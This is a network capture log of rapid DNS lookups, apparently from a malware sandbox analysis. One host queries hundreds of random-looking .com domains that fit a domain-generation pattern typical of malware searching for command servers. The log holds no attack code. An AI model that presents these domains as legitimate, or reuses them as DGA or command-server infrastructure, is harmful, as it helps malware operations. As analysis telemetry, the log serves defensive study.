Aug 23, 2024 18:48:50.517923117 CEST	192.168.2.4	1.1.1.1	0x4016	Standard query (0)	ganyvoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.518013954 CEST	192.168.2.4	1.1.1.1	0xfc52	Standard query (0)	pupyjuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.519428015 CEST	192.168.2.4	1.1.1.1	0xfa04	Standard query (0)	vopyjuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.520927906 CEST	192.168.2.4	1.1.1.1	0x8bd5	Standard query (0)	qekyxul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.521362066 CEST	192.168.2.4	1.1.1.1	0x9b8a	Standard query (0)	lykytej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.521518946 CEST	192.168.2.4	1.1.1.1	0x72c8	Standard query (0)	qebyvop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.521661997 CEST	192.168.2.4	1.1.1.1	0xf4c2	Standard query (0)	pujyteq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.521934032 CEST	192.168.2.4	1.1.1.1	0x4df3	Standard query (0)	gatyhub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.522136927 CEST	192.168.2.4	1.1.1.1	0xb2cc	Standard query (0)	lyvyvix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.522313118 CEST	192.168.2.4	1.1.1.1	0x5ed6	Standard query (0)	vojyrak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.522325993 CEST	192.168.2.4	1.1.1.1	0x6e08	Standard query (0)	qetyhyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.522577047 CEST	192.168.2.4	1.1.1.1	0xd443	Standard query (0)	puvycip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.522730112 CEST	192.168.2.4	1.1.1.1	0x4848	Standard query (0)	vojyzyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.522823095 CEST	192.168.2.4	1.1.1.1	0xc9e5	Standard query (0)	puzypug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:51.012039900 CEST	192.168.2.4	1.1.1.1	0xe0f4	Standard query (0)	gatyhub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:51.013115883 CEST	192.168.2.4	1.1.1.1	0x34d0	Standard query (0)	qetyhyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.599138021 CEST	192.168.2.4	1.1.1.1	0x6683	Standard query (0)	gahyraw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.600615978 CEST	192.168.2.4	1.1.1.1	0x2206	Standard query (0)	lyrygyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.601932049 CEST	192.168.2.4	1.1.1.1	0xfdfd	Standard query (0)	vocycuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.602658033 CEST	192.168.2.4	1.1.1.1	0xc64e	Standard query (0)	qegyrol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.604034901 CEST	192.168.2.4	1.1.1.1	0x34a4	Standard query (0)	purygeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.604650974 CEST	192.168.2.4	1.1.1.1	0x5302	Standard query (0)	gacycus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.606050968 CEST	192.168.2.4	1.1.1.1	0xb2b6	Standard query (0)	lygywor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.606614113 CEST	192.168.2.4	1.1.1.1	0xa4ce	Standard query (0)	vowygem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.608494997 CEST	192.168.2.4	1.1.1.1	0x17ba	Standard query (0)	qexyxuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.609159946 CEST	192.168.2.4	1.1.1.1	0xd83b	Standard query (0)	pufywil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.609886885 CEST	192.168.2.4	1.1.1.1	0x5ce9	Standard query (0)	gaqyfah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.609899044 CEST	192.168.2.4	1.1.1.1	0xc963	Standard query (0)	lyxyxyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.610548973 CEST	192.168.2.4	1.1.1.1	0xe8ff	Standard query (0)	qeqyfaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.611964941 CEST	192.168.2.4	1.1.1.1	0x823f	Standard query (0)	puzyxyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.612175941 CEST	192.168.2.4	1.1.1.1	0x78f2	Standard query (0)	gadyquz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614048004 CEST	192.168.2.4	1.1.1.1	0x41b	Standard query (0)	lymyfoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614059925 CEST	192.168.2.4	1.1.1.1	0xc4dd	Standard query (0)	volyzef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614207029 CEST	192.168.2.4	1.1.1.1	0x3679	Standard query (0)	vofyqit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614279985 CEST	192.168.2.4	1.1.1.1	0xd0	Standard query (0)	pumydoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614582062 CEST	192.168.2.4	1.1.1.1	0xab66	Standard query (0)	qedyqup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614728928 CEST	192.168.2.4	1.1.1.1	0xa9ec	Standard query (0)	lysymux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614728928 CEST	192.168.2.4	1.1.1.1	0x827f	Standard query (0)	galyzeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614800930 CEST	192.168.2.4	1.1.1.1	0x2ef1	Standard query (0)	pupymyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614875078 CEST	192.168.2.4	1.1.1.1	0x361b	Standard query (0)	vonydik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.614968061 CEST	192.168.2.4	1.1.1.1	0xf641	Standard query (0)	ganydiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615046978 CEST	192.168.2.4	1.1.1.1	0xd957	Standard query (0)	lykylan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615144014 CEST	192.168.2.4	1.1.1.1	0x9f04	Standard query (0)	vopymyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615314007 CEST	192.168.2.4	1.1.1.1	0x140	Standard query (0)	pujylog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615324974 CEST	192.168.2.4	1.1.1.1	0x2be0	Standard query (0)	qebysul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615504980 CEST	192.168.2.4	1.1.1.1	0x6d96	Standard query (0)	lyvysur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615561962 CEST	192.168.2.4	1.1.1.1	0xae84	Standard query (0)	gatynes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615675926 CEST	192.168.2.4	1.1.1.1	0x26ea	Standard query (0)	vojykom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.615778923 CEST	192.168.2.4	1.1.1.1	0xe3c0	Standard query (0)	qekylag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616015911 CEST	192.168.2.4	1.1.1.1	0x6cdf	Standard query (0)	qetynev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616029024 CEST	192.168.2.4	1.1.1.1	0x3e36	Standard query (0)	puvypul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616267920 CEST	192.168.2.4	1.1.1.1	0xb344	Standard query (0)	gahykih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616327047 CEST	192.168.2.4	1.1.1.1	0x2d1a	Standard query (0)	lyrynad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616494894 CEST	192.168.2.4	1.1.1.1	0x20fe	Standard query (0)	vocypyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616729021 CEST	192.168.2.4	1.1.1.1	0x4279	Standard query (0)	qegykiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616751909 CEST	192.168.2.4	1.1.1.1	0x216	Standard query (0)	purybav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616919994 CEST	192.168.2.4	1.1.1.1	0x5628	Standard query (0)	gacypyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.616959095 CEST	192.168.2.4	1.1.1.1	0xb083	Standard query (0)	lygyjuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617146015 CEST	192.168.2.4	1.1.1.1	0xeaf9	Standard query (0)	qexytep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617146015 CEST	192.168.2.4	1.1.1.1	0x685c	Standard query (0)	vowybof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617296934 CEST	192.168.2.4	1.1.1.1	0x583d	Standard query (0)	gaqyvob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617337942 CEST	192.168.2.4	1.1.1.1	0xeb7	Standard query (0)	lyxytex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617503881 CEST	192.168.2.4	1.1.1.1	0x928e	Standard query (0)	pufyjuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617503881 CEST	192.168.2.4	1.1.1.1	0xa77d	Standard query (0)	vofyjuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617700100 CEST	192.168.2.4	1.1.1.1	0xd3b	Standard query (0)	puzytap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617712975 CEST	192.168.2.4	1.1.1.1	0x503a	Standard query (0)	qeqyvig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617902040 CEST	192.168.2.4	1.1.1.1	0xa06d	Standard query (0)	gadyhyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.617902040 CEST	192.168.2.4	1.1.1.1	0x175b	Standard query (0)	lymyvin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618071079 CEST	192.168.2.4	1.1.1.1	0xe637	Standard query (0)	volyrac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618109941 CEST	192.168.2.4	1.1.1.1	0x40ea	Standard query (0)	qedyhyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618308067 CEST	192.168.2.4	1.1.1.1	0xf14e	Standard query (0)	galyros.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618308067 CEST	192.168.2.4	1.1.1.1	0xf81d	Standard query (0)	pumycug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618495941 CEST	192.168.2.4	1.1.1.1	0xa67e	Standard query (0)	lysyger.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618531942 CEST	192.168.2.4	1.1.1.1	0x1626	Standard query (0)	vonycum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618727922 CEST	192.168.2.4	1.1.1.1	0x77fa	Standard query (0)	qekyrov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618727922 CEST	192.168.2.4	1.1.1.1	0xebb2	Standard query (0)	pupygel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618920088 CEST	192.168.2.4	1.1.1.1	0x59fb	Standard query (0)	lykywid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.618951082 CEST	192.168.2.4	1.1.1.1	0x9e85	Standard query (0)	ganycuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.619103909 CEST	192.168.2.4	1.1.1.1	0xa1df	Standard query (0)	qebyxyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.619158983 CEST	192.168.2.4	1.1.1.1	0x24af	Standard query (0)	vopygat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.673079014 CEST	192.168.2.4	1.1.1.1	0xb888	Standard query (0)	pujywiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.673724890 CEST	192.168.2.4	1.1.1.1	0xbcb8	Standard query (0)	gatyfaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.674312115 CEST	192.168.2.4	1.1.1.1	0x5646	Standard query (0)	lyvyxyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.674839020 CEST	192.168.2.4	1.1.1.1	0xb404	Standard query (0)	vojyquf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.675321102 CEST	192.168.2.4	1.1.1.1	0x2719	Standard query (0)	puvyxeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.675627947 CEST	192.168.2.4	1.1.1.1	0xdec1	Standard query (0)	gahyqub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.675956964 CEST	192.168.2.4	1.1.1.1	0xf44f	Standard query (0)	vocyzek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.676372051 CEST	192.168.2.4	1.1.1.1	0xee43	Standard query (0)	qegyqug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.676424980 CEST	192.168.2.4	1.1.1.1	0x2106	Standard query (0)	purydip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.676904917 CEST	192.168.2.4	1.1.1.1	0x8eb8	Standard query (0)	lygymyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.677122116 CEST	192.168.2.4	1.1.1.1	0x6ccf	Standard query (0)	vowydic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.679119110 CEST	192.168.2.4	1.1.1.1	0xa69e	Standard query (0)	qexylal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.679442883 CEST	192.168.2.4	1.1.1.1	0xb3d	Standard query (0)	pufymyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.680902958 CEST	192.168.2.4	1.1.1.1	0x21f1	Standard query (0)	qetyfop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681075096 CEST	192.168.2.4	1.1.1.1	0x76ed	Standard query (0)	lyryfox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681075096 CEST	192.168.2.4	1.1.1.1	0xc2c3	Standard query (0)	lyxylor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681075096 CEST	192.168.2.4	1.1.1.1	0x100c	Standard query (0)	gacyzaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681209087 CEST	192.168.2.4	1.1.1.1	0xfb25	Standard query (0)	gaqydus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681294918 CEST	192.168.2.4	1.1.1.1	0x10a4	Standard query (0)	vofymem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681415081 CEST	192.168.2.4	1.1.1.1	0x256c	Standard query (0)	qeqysuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681449890 CEST	192.168.2.4	1.1.1.1	0x9091	Standard query (0)	puzylol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681648016 CEST	192.168.2.4	1.1.1.1	0x429b	Standard query (0)	gadyneh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681737900 CEST	192.168.2.4	1.1.1.1	0xa439	Standard query (0)	lymysud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681900024 CEST	192.168.2.4	1.1.1.1	0x9146	Standard query (0)	volykit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.681941986 CEST	192.168.2.4	1.1.1.1	0x5f27	Standard query (0)	qedynaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.682158947 CEST	192.168.2.4	1.1.1.1	0xe502	Standard query (0)	galykiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.682188034 CEST	192.168.2.4	1.1.1.1	0x8e29	Standard query (0)	pumypyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.682337999 CEST	192.168.2.4	1.1.1.1	0xa3ec	Standard query (0)	lysynaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.682529926 CEST	192.168.2.4	1.1.1.1	0x74d3	Standard query (0)	vonypyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.682637930 CEST	192.168.2.4	1.1.1.1	0x569a	Standard query (0)	qebyteg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.682779074 CEST	192.168.2.4	1.1.1.1	0xf3b8	Standard query (0)	qekykup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.682842970 CEST	192.168.2.4	1.1.1.1	0x91bb	Standard query (0)	pupyboq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683024883 CEST	192.168.2.4	1.1.1.1	0xa910	Standard query (0)	vopybok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683036089 CEST	192.168.2.4	1.1.1.1	0xcc74	Standard query (0)	lyvytan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683228016 CEST	192.168.2.4	1.1.1.1	0x7408	Standard query (0)	qetyvil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683363914 CEST	192.168.2.4	1.1.1.1	0x6e11	Standard query (0)	puvytag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683398008 CEST	192.168.2.4	1.1.1.1	0x584d	Standard query (0)	gahyhys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683541059 CEST	192.168.2.4	1.1.1.1	0xead7	Standard query (0)	lyryvur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683792114 CEST	192.168.2.4	1.1.1.1	0xc25f	Standard query (0)	vocyrom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683803082 CEST	192.168.2.4	1.1.1.1	0x4556	Standard query (0)	qegyhev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.683973074 CEST	192.168.2.4	1.1.1.1	0x8474	Standard query (0)	purycul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684005976 CEST	192.168.2.4	1.1.1.1	0xa792	Standard query (0)	gacyroh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684185982 CEST	192.168.2.4	1.1.1.1	0x504b	Standard query (0)	lygyged.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684209108 CEST	192.168.2.4	1.1.1.1	0x46fe	Standard query (0)	vowycut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684345007 CEST	192.168.2.4	1.1.1.1	0x7c4	Standard query (0)	qexyriq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684391022 CEST	192.168.2.4	1.1.1.1	0x6a93	Standard query (0)	vojyjyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684506893 CEST	192.168.2.4	1.1.1.1	0x5ed	Standard query (0)	gaqycyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684581995 CEST	192.168.2.4	1.1.1.1	0xc3af	Standard query (0)	gatyviw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684669971 CEST	192.168.2.4	1.1.1.1	0x9ea3	Standard query (0)	pufygav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684787035 CEST	192.168.2.4	1.1.1.1	0x1d6b	Standard query (0)	ganypeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.684828043 CEST	192.168.2.4	1.1.1.1	0x67e8	Standard query (0)	lyxywij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.685530901 CEST	192.168.2.4	1.1.1.1	0x3215	Standard query (0)	vofygaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.685636997 CEST	192.168.2.4	1.1.1.1	0xc347	Standard query (0)	lykyjux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.685720921 CEST	192.168.2.4	1.1.1.1	0x5525	Standard query (0)	qeqyxyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.685825109 CEST	192.168.2.4	1.1.1.1	0xda2	Standard query (0)	pujyjup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.685971022 CEST	192.168.2.4	1.1.1.1	0xdb2	Standard query (0)	puzywuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686136007 CEST	192.168.2.4	1.1.1.1	0x2f14	Standard query (0)	gadyfob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686342001 CEST	192.168.2.4	1.1.1.1	0xbbb2	Standard query (0)	volyquk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686342001 CEST	192.168.2.4	1.1.1.1	0xc0d3	Standard query (0)	qedyfog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686508894 CEST	192.168.2.4	1.1.1.1	0xac9d	Standard query (0)	pumyxep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686508894 CEST	192.168.2.4	1.1.1.1	0xc489	Standard query (0)	lymyxex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686618090 CEST	192.168.2.4	1.1.1.1	0xe418	Standard query (0)	galyquw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686686039 CEST	192.168.2.4	1.1.1.1	0xca27	Standard query (0)	lysyfin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.686817884 CEST	192.168.2.4	1.1.1.1	0x3317	Standard query (0)	vonyzac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.224812984 CEST	192.168.2.4	1.1.1.1	0x6190	Standard query (0)	qekyqyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.225435972 CEST	192.168.2.4	1.1.1.1	0x96a1	Standard query (0)	pupydig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.226006031 CEST	192.168.2.4	1.1.1.1	0xae0d	Standard query (0)	ganyzas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.226572037 CEST	192.168.2.4	1.1.1.1	0x6d59	Standard query (0)	lykymyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.227030039 CEST	192.168.2.4	1.1.1.1	0xea6b	Standard query (0)	vopydum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.227339983 CEST	192.168.2.4	1.1.1.1	0xcfb9	Standard query (0)	qebylov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.227734089 CEST	192.168.2.4	1.1.1.1	0x42a4	Standard query (0)	gatyduh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.228112936 CEST	192.168.2.4	1.1.1.1	0x6b6d	Standard query (0)	lyvylod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.228708982 CEST	192.168.2.4	1.1.1.1	0xd1ac	Standard query (0)	vojymet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.228708982 CEST	192.168.2.4	1.1.1.1	0xfc6a	Standard query (0)	puvyliv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.228725910 CEST	192.168.2.4	1.1.1.1	0xf7be	Standard query (0)	qetysuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.228940010 CEST	192.168.2.4	1.1.1.1	0x79a0	Standard query (0)	gahynaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.229387999 CEST	192.168.2.4	1.1.1.1	0xe7e2	Standard query (0)	vocykif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.229410887 CEST	192.168.2.4	1.1.1.1	0x8c0f	Standard query (0)	lyrysyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.229895115 CEST	192.168.2.4	1.1.1.1	0x2077	Standard query (0)	qegynap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.229933023 CEST	192.168.2.4	1.1.1.1	0x966d	Standard query (0)	gacykub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.230037928 CEST	192.168.2.4	1.1.1.1	0xdf4c	Standard query (0)	purypyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.230556011 CEST	192.168.2.4	1.1.1.1	0xb783	Standard query (0)	lygynox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.230592012 CEST	192.168.2.4	1.1.1.1	0x5fcb	Standard query (0)	vowypek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.230689049 CEST	192.168.2.4	1.1.1.1	0xa975	Standard query (0)	qexykug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.231211901 CEST	192.168.2.4	1.1.1.1	0x9a0	Standard query (0)	pufybop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.231235027 CEST	192.168.2.4	1.1.1.1	0x7000	Standard query (0)	lyxyjun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.231384993 CEST	192.168.2.4	1.1.1.1	0xf593	Standard query (0)	gaqypew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.231909037 CEST	192.168.2.4	1.1.1.1	0x80d3	Standard query (0)	vofybic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.232152939 CEST	192.168.2.4	1.1.1.1	0x99df	Standard query (0)	qeqytal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.232719898 CEST	192.168.2.4	1.1.1.1	0xb709	Standard query (0)	puzyjyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.233071089 CEST	192.168.2.4	1.1.1.1	0x889e	Standard query (0)	gadyvis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.233828068 CEST	192.168.2.4	1.1.1.1	0x431f	Standard query (0)	lymytar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.234117031 CEST	192.168.2.4	1.1.1.1	0x255e	Standard query (0)	volyjym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.234844923 CEST	192.168.2.4	1.1.1.1	0x54b2	Standard query (0)	qedyvuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.234961033 CEST	192.168.2.4	1.1.1.1	0xe33c	Standard query (0)	pumytol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.235502005 CEST	192.168.2.4	1.1.1.1	0x592d	Standard query (0)	galyheh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.235517979 CEST	192.168.2.4	1.1.1.1	0x42f3	Standard query (0)	lysyvud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.235730886 CEST	192.168.2.4	1.1.1.1	0x43d2	Standard query (0)	vonyrot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.236156940 CEST	192.168.2.4	1.1.1.1	0x5821	Standard query (0)	qekyheq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.236267090 CEST	192.168.2.4	1.1.1.1	0x4174	Standard query (0)	pupycuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.236694098 CEST	192.168.2.4	1.1.1.1	0xa77a	Standard query (0)	ganyriz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.236762047 CEST	192.168.2.4	1.1.1.1	0x1db0	Standard query (0)	lykygaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.237011909 CEST	192.168.2.4	1.1.1.1	0x6bf2	Standard query (0)	vopycyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.237468004 CEST	192.168.2.4	1.1.1.1	0x634	Standard query (0)	qebyrip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.237600088 CEST	192.168.2.4	1.1.1.1	0x62c	Standard query (0)	pujygaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.237961054 CEST	192.168.2.4	1.1.1.1	0x1f4f	Standard query (0)	gatycyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.238028049 CEST	192.168.2.4	1.1.1.1	0xfc6c	Standard query (0)	lyvywux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.238564968 CEST	192.168.2.4	1.1.1.1	0x6fd3	Standard query (0)	qetyxeg.com	A (IP address)	IN (0x0001)	false
